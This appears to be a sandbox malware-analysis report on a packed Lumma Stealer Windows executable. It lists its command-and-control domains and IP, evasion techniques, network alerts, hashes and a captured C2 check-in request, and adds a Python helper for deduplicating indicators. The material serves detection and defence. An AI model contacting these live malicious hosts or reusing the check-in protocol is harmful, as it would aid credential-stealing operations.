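To use it on a real artefact, read the process dump or the unpacked PE into `blob` (for example the 00000000.00000002.1733501177.0000000000B33000 region named in the rows above). Hits in the "protector" category explain the rdtsc, self-modifying-code and window-name checks as the packer's doing; hits only in the payload regions point at checks the malware author added.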

    HIPS / PFW / Operating System Protection Evasion

Source: file.exe | String found in binary or memory: p3ar11fter.sbs
Source: file.exe | String found in binary or memory: 3xp3cts1aim.sbs
Source: file.exe | String found in binary or memory: p10tgrace.sbs
Source: file.exe | String found in binary or memory: peepburry828.sbs
Source: file.exe | String found in binary or memory: processhol.sbs
Source: file.exe, file.exe, 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: +Program Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK techniques matched by the signatures (number of matching signatures in parentheses; matrix cells without a match are omitted):

Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); PowerShell (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (1); DLL Side-Loading (1)
Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Discovery: Security Software Discovery (631); Virtualization/Sandbox Evasion (24); Process Discovery (2); System Information Discovery (223)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113)
No techniques matched under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Antivirus detection (sample)
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches for the other scanned categories.

Antivirus detection (URLs)
Source | Detection | Scanner | Label
https://cook-rain.sbs/apiOn | 100% | Avira URL Cloud | malware
https://cook-rain.sbs:443/api- | 100% | Avira URL Cloud | malware
https://cook-rain.sbs/Q | 100% | Avira URL Cloud | malware
https://cook-rain.sbs/api% | 100% | Avira URL Cloud | malware
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cook-rain.sbs | 104.21.66.38 | true | false | | high

Domains and URLs found in strings
Name | Malicious | Antivirus Detection | Reputation
p10tgrace.sbs | false | | high
p3ar11fter.sbs | false | | high
https://cook-rain.sbs/api | false | | high
peepburry828.sbs | false | | high
processhol.sbs | false | | high

URLs found in memory
Name | Source | Malicious | Antivirus Detection | Reputation
https://cook-rain.sbs/ | file.exe, 00000000.00000002.1734316733.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cook-rain.sbs/api% | file.exe, 00000000.00000002.1734132839.000000000129B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cook-rain.sbs/apiOn | file.exe, 00000000.00000003.1732682281.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733073508.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1734316733.00000000012D4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.micro | file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cook-rain.sbs/Q | file.exe, 00000000.00000002.1734316733.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cook-rain.sbs:443/api- | file.exe, 00000000.00000002.1734132839.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.0000000001262000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.38 | cook-rain.sbs | United States | 13335 | CLOUDFLARENETUS | false
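The URL-scanner and memory tables above list https://cook-rain.sbs/apiOn, /api%, /Q and :443/api-, while the strings table gives https://cook-rain.sbs/api as the clean endpoint; the odd suffixes are bytes that happened to follow the URL in memory when the strings were cut out of the dumps, so feeding them to a blocklist as four distinct URLs would be wrong. The following Python helper is an added example, not report tooling, that canonicalises such URLs (lower-cases scheme and host, drops the scheme's default port, strips a dangling percent sign), collapses hits that only extend a confirmed endpoint by a few bytes, flags the rest as unverified, and assembles one deduplicated indicator set together with the configuration domains from the strings rows and the resolved IP from the contacted-domain table. The inputs are copied from this report; the three-character tolerance for trailing residue is an assumption chosen for this report's data.

```python
from urllib.parse import urlsplit

# Constructed inputs, copied from the tables of this report.
SCANNER_URLS = [
    "https://cook-rain.sbs/apiOn",
    "https://cook-rain.sbs:443/api-",
    "https://cook-rain.sbs/Q",
    "https://cook-rain.sbs/api%",
]
CONFIRMED_URLS = ["https://cook-rain.sbs/api"]            # clean endpoint from the strings table
CONFIG_DOMAINS = ["p3ar11fter.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs",
                  "peepburry828.sbs", "processhol.sbs"]  # strings found in the binary
RESOLVED = {"cook-rain.sbs": "104.21.66.38"}             # contacted-domain table

DEFAULT_PORTS = {"http": 80, "https": 443}
MAX_TAIL = 3   # assumption: up to this many trailing bytes are treated as memory residue


def canonical(url: str) -> str:
    """Lower-case scheme and host, drop the scheme's default port and strip a
    dangling '%' (an incomplete percent-escape cannot end a real URL)."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port
    netloc = host if port in (None, DEFAULT_PORTS.get(scheme)) else f"{host}:{port}"
    path = parts.path.rstrip("%") or "/"
    url = f"{scheme}://{netloc}{path}"
    return url + ("?" + parts.query if parts.query else "")


def classify(candidates, confirmed):
    """Map each raw scanner hit to (canonical url, status). 'collapsed' means the
    hit only extends a confirmed endpoint by at most MAX_TAIL characters."""
    confirmed = [canonical(u) for u in confirmed]
    result = {}
    for raw in candidates:
        url = canonical(raw)
        status = "unverified"
        if url in confirmed:
            status = "confirmed"
        else:
            for base in confirmed:
                if url.startswith(base) and len(url) - len(base) <= MAX_TAIL:
                    url, status = base, "collapsed"
                    break
        result[raw] = (url, status)
    return result


def build_iocs() -> dict:
    """Deduplicated indicator set: confirmed and collapsed URLs, every domain the
    sample carries or contacted, the IPs those domains resolved to, and the
    URLs that still need a human look."""
    mapped = classify(SCANNER_URLS, CONFIRMED_URLS)
    urls = {canonical(u) for u in CONFIRMED_URLS}
    urls |= {u for u, status in mapped.values() if status != "unverified"}
    domains = set(CONFIG_DOMAINS) | set(RESOLVED)
    domains |= {urlsplit(u).hostname for u in urls}
    return {
        "urls": sorted(urls),
        "domains": sorted(domains),
        "ips": sorted(set(RESOLVED.values())),
        "unverified": sorted(u for u, s in mapped.values() if s == "unverified"),
    }


if __name__ == "__main__":
    for raw, (url, status) in classify(SCANNER_URLS, CONFIRMED_URLS).items():
        print(f"{status:10s} {raw} -> {url}")
    print(build_iocs())
```

The five .sbs domains from the strings rows go into the set even though the sandbox never saw them resolved: for this family the binary carries a list of fallback C2 hosts and only the first reachable one shows up in the network trace, so the rest are the indicators that will matter once cook-rain.sbs is taken down.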
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560426
Start date and time: 2024-11-21 19:56:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
Time | Type | Description
13:57:00 | API Interceptor | 2x Sleep call for process: file.exe modified
Context for IP 104.21.66.38 (other samples seen contacting it)
Associated Sample Name / URL | Detection | Threat Name
file.exe | malicious | LummaC
file.exe | malicious | LummaC
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
file.exe | malicious | LummaC
file.exe | malicious | LummaC
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
Loader.exe | malicious | LummaC
file.exe | malicious | LummaC
file.exe | malicious | LummaC
file.exe | malicious | LummaC

Context for domain cook-rain.sbs (other samples seen contacting it, with the IP it resolved to at the time)
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC | 104.21.66.38
file.exe | malicious | LummaC | 104.21.66.38
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.66.38
file.exe | malicious | LummaC | 104.21.66.38
injector V2.4.exe | malicious | LummaC | 172.67.155.248
file.exe | malicious | LummaC | 104.21.66.38
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 104.21.66.38
Loader.exe | malicious | LummaC | 104.21.66.38
ADZ Laucher.exe | malicious | LummaC | 172.67.155.248
file.exe | malicious | LummaC | 188.114.97.3

Context for ASN CLOUDFLARENETUS (other samples contacting this ASN, with the IP used)
Associated Sample Name / URL | Detection | Threat Name | Context
Status Update DXLG.html | malicious | Unknown | 104.17.25.14
DHzscd9uqT.exe | malicious | STRRAT | 104.20.3.235
http://bc1qcr8muz00d2v7uqg5ggulrmm.com | malicious | Unknown | 104.21.5.242
https://www.google.com/url?sa=https://r20.rs6.net/tns.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/d7TO.ifvxdvrhe.ru%2FDflmD%2F | malicious | Unknown | 104.17.25.14
scam.html | malicious | Unknown | 172.67.200.84
file.exe | malicious | LummaC | 104.21.66.38
https://bafkreifkijr4deqnzixvigwgbpmegtl7w7z65bwaf2xegf6wb5oejvy7je.ipfs.flk-ipfs.xyz/#mail@andrejsmanagement.com&c=E,1,7ZfSQ9vAYe7rvB9NwKAqcoBV6_2nCPL09QKb7jG3WYDaiZix9u1hiaulren8GlCVh8tr3ArY61yo0-gZFvLQqJ6pANsbQuIKnEW2EuUntXIIWBvyOuRTAdpQ&typo=1 | malicious | Unknown | 1.1.1.1
http://email.double.serviceautopilot.com/c/eJwczE2OrCAQAODTyA5ThfwUCxZv0_coqOJJom1HbZO5_SRzga8d-4ffP0MKRcKWQG0OMVjforMsga04XpR789LQSOkxO4pGC6YFiSjHbHTnsQ0pXnvtot1yXZL1Gthyr2SJckV2vXkQs5bMsUNk5LqACCFoapQqh4SYAzgzigPnEZEAMEKeQw-1xc5OKcWwwORBjm_ddL70fEZT_t7HZ2zHPbdjN1tZ7_szLf8m95rcq4nKOR69Zr0m96rje487ZnOWnd_8X8_Jwzq27RqiO7-Pc1__mKe43wAAAP__Gf5XhQ | malicious | Unknown | 104.16.124.96
file.exe | malicious | LummaC | 104.21.66.38
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.66.38

Context for JA3 fingerprint a0e9f5d64349fb13191bc781f81f42e1 (other samples with the same TLS client fingerprint, with the IP they contacted)
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC | 104.21.66.38
SeleniumVBA.xlsm | malicious | Unknown | 104.21.66.38
file.exe | malicious | LummaC | 104.21.66.38
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.66.38
file.exe | malicious | LummaC | 104.21.66.38
injector V2.4.exe | malicious | LummaC | 104.21.66.38
RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat | malicious | AgentTesla, DBatLoader | 104.21.66.38
u.xls | malicious | Braodo | 104.21.66.38
injector V2.4.exe | malicious | LummaC | 104.21.66.38
injector V2.5.exe | malicious | LummaC | 104.21.66.38
                                        No context
                                        No created / dropped files found
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.9510044991696605
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:1'858'048 bytes
                                        MD5:6380b8ca2f9bfc1d86617a3a7fd924f1
                                        SHA1:04ff7e660a59bd2c45098e99a3fd5bff614d2d57
                                        SHA256:f7b7694decac18c856b37c68c8486eccd09470ec28c7f92d90f5f0905110eb7c
                                        SHA512:8b7d7728ac97e310b2b01ed34967a8eddb0663427d9d0be4ecdb6b1568194aa2edb1232daeced175d71e2dd7c6c453204b4f004ba8706ee4790473d86f9ab033
                                        SSDEEP:24576:Un1N/9/M73pKzpmVWfGQiljS+II1JOEQydhrBieETdpZwr4H4DfWtp+QpO68ihGo:U0K9mVWfG1ldB15DxkVhtp+BChOo
                                        TLSH:468533510F96F37CE1F760F89DED0D62B6727708F9098C3C2D24EA38D5169A70A25176
                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................I...........@.......................... J.....5.....@.................................\...p..
                                        Icon Hash:90cececece8e8eb0
                                        Entrypoint:0x89f000
                                        Entrypoint Section:.taggant
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5805c | 0x70 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x581f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x56000 | 0x26200 | 2cb0094ee1f447aa2d164d8e76f301d3 | False | 0.9994748975409836 | data | 7.987246249896705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x57000 | 0x2b0 | 0x200 | 70f1a79bc3860113a0c2b5e611e88296 | False | 0.80078125 | data | 6.026796984354681 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x58000 | 0x1000 | 0x200 | c92ced077364b300efd06b14c70a61dc | False | 0.15625 | data | 1.1194718105633323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x59000 | 0x2a9000 | 0x200 | 140ef775e31cb728401f820822e38b85 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nbqdyuoa | 0x302000 | 0x19c000 | 0x19ba00 | 76458bfc600abd08d8ff9974f9334d34 | False | 0.9944721758275129 | data | 7.954937787050603 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lsjapkzb | 0x49e000 | 0x1000 | 0x600 | eb60b14fc4651334b4bd715c9a0b9fb4 | False | 0.5904947916666666 | data | 5.024203837640284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x49f000 | 0x3000 | 0x2200 | efffe62ed3a7ccf77c2baf133841116d | False | 0.06629136029411764 | DOS executable (COM) | 0.8085361294890754 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x49d5e8 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T19:56:59.191822+0100 | 2057730 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) | 1 | 192.168.2.4 | 54395 | 1.1.1.1 | 53 | UDP
2024-11-21T19:57:01.063780+0100 | 2057731 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) | 1 | 192.168.2.4 | 49730 | 104.21.66.38 | 443 | TCP
2024-11-21T19:57:01.063780+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.66.38 | 443 | TCP
2024-11-21T19:57:01.802442+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.66.38 | 443 | TCP
2024-11-21T19:57:01.802442+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.66.38 | 443 | TCP
2024-11-21T19:57:03.173261+0100 | 2057731 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) | 1 | 192.168.2.4 | 49731 | 104.21.66.38 | 443 | TCP
2024-11-21T19:57:03.173261+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.66.38 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 19:56:59.781342983 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:56:59.781393051 CET | 443 | 49730 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:56:59.781474113 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:56:59.784647942 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:56:59.784665108 CET | 443 | 49730 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:01.063669920 CET | 443 | 49730 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:01.063780069 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.067483902 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.067497015 CET | 443 | 49730 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:01.067892075 CET | 443 | 49730 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:01.118263006 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.126914978 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.126956940 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.127177954 CET | 443 | 49730 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:01.802469969 CET | 443 | 49730 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:01.802596092 CET | 443 | 49730 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:01.802659988 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.806107044 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.806126118 CET | 443 | 49730 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:01.806147099 CET | 49730 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.806152105 CET | 443 | 49730 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:01.868021011 CET | 49731 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.868118048 CET | 443 | 49731 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:01.868199110 CET | 49731 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.868766069 CET | 49731 | 443 | 192.168.2.4 | 104.21.66.38
Nov 21, 2024 19:57:01.868798971 CET | 443 | 49731 | 104.21.66.38 | 192.168.2.4
Nov 21, 2024 19:57:03.173260927 CET | 49731 | 443 | 192.168.2.4 | 104.21.66.38
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 19:56:59.191822052 CET | 54395 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 19:56:59.775448084 CET | 53 | 54395 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 19:56:59.191822052 CET | 192.168.2.4 | 1.1.1.1 | 0x6120 | Standard query (0) | cook-rain.sbs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 19:56:59.775448084 CET | 1.1.1.1 | 192.168.2.4 | 0x6120 | No error (0) | cook-rain.sbs | | 104.21.66.38 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 19:56:59.775448084 CET | 1.1.1.1 | 192.168.2.4 | 0x6120 | No error (0) | cook-rain.sbs | | 172.67.155.248 | A (IP address) | IN (0x0001) | false
                                        • cook-rain.sbs
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.66.38 | 443 | 6408 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 18:57:01 UTC | 260 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: cook-rain.sbs
2024-11-21 18:57:01 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-11-21 18:57:01 UTC | 999 | IN | HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 18:57:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=6212j4miqd8j8e1m5h89sm4s8h; expires=Mon, 17-Mar-2025 12:43:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z42g0xRxOVb0lrLHCs7qwAO7KgW73TXIlZTtJPo6qVedj6MQOAntpC4po%2FpRszhrGnfwjeNiYSePXuVPvkTUwejMmz6P4IbEQcwGNXnsjhKFhthDyz5FiULpmzU6viZU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e62e72f7f8b4240-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1731&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=904&delivery_rate=1668571&cwnd=242&unsent_bytes=0&cid=be0829dcb286f22e&ts=763&x=0"
2024-11-21 18:57:01 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-11-21 18:57:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



                                        Target ID:0
                                        Start time:13:56:57
                                        Start date:21/11/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0x950000
                                        File size:1'858'048 bytes
                                        MD5 hash:6380B8CA2F9BFC1D86617A3A7FD924F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:3.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:66.4%
                                          Total number of Nodes:235
                                          Total number of Limit Nodes:14

                                          Control-flow Graph

                                          APIs
                                          • SysAllocString.OLEAUT32(13C511C2), ref: 009891B6
                                          • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009891FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: AllocBlanketProxyString
                                          • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                                          • API String ID: 900851650-4011188741
                                          • Opcode ID: a6b98b1d6c8312d99b35506abcad0b717ba1e4b2854cf9503a1730447a7874c8
                                          • Instruction ID: b7225ecd7e9b8aecc7751ce978986d6c2b91c20084d0e94a85bca4df61257dec
                                          • Opcode Fuzzy Hash: a6b98b1d6c8312d99b35506abcad0b717ba1e4b2854cf9503a1730447a7874c8
                                          • Instruction Fuzzy Hash: 35224371A083019BE720DF24C881B6BBBAAEFD5354F188A1CF4959B3D1E774D905CB92

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
